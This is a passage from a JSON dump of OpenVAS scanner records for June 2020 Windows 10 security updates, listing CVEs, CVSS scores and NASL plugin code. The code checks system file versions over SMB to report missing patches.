"CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310817144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817144", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817144\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1120\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1261\",\n \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\",\n \"CVE-2020-1268\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1273\", \"CVE-2020-1274\", \"CVE-2020-1275\",\n \"CVE-2020-1276\", \"CVE-2020-1277\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\",\n \"CVE-2020-1284\", \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\",\n \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\", \"CVE-2020-1294\",\n \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\", \"CVE-2020-1301\",\n \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\", \"CVE-2020-1306\",\n \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1311\", \"CVE-2020-1312\",\n \"CVE-2020-1313\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\",\n \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4557957)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4557957\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error when Connected User Experiences and Telemetry Service improperly\n handles file operations.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 2004 for 32-bit Systems\n\n - Microsoft Windows 10 Version 2004 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4557957\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdiplus.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.19041.0\", test_version2:\"10.0.19041.328\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdiplus.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.19041.0 - 10.0.19041.328\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:39", "description": "This host is missing a critical security\n update according to Microsoft KB4560960", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4560960)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310817140", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817140", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817140\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1265\", \"CVE-2020-1266\", \"CVE-2020-1268\", \"CVE-2020-1269\",\n \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1273\",\n \"CVE-2020-1274\", \"CVE-2020-1275\", \"CVE-2020-1276\", \"CVE-2020-1277\",\n \"CVE-2020-1278\", \"CVE-2020-1279\", \"CVE-2020-1280\", \"CVE-2020-1281\",\n \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1286\", \"CVE-2020-1287\",\n \"CVE-2020-1290\", \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\",\n \"CVE-2020-1294\", \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\",\n \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\",\n \"CVE-2020-1306\", \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1313\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4560960)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4560960\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 for 32-bit/x64-based Systems\n\n - Microsoft Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4560960\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.899\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.899\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:34", "description": "This host is missing a critical security\n update according to Microsoft KB4561649", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561649)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310817143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817143", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817143\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1197\",\n \"CVE-2020-1202\", \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1234\", \"CVE-2020-1236\", \"CVE-2020-1239\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1278\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1310\", \"CVE-2020-1311\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561649)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561649\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561649\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18607\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18607\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:35", "description": "This host is missing a critical security\n update according to Microsoft KB4561621", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561621)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310817145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817145", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is f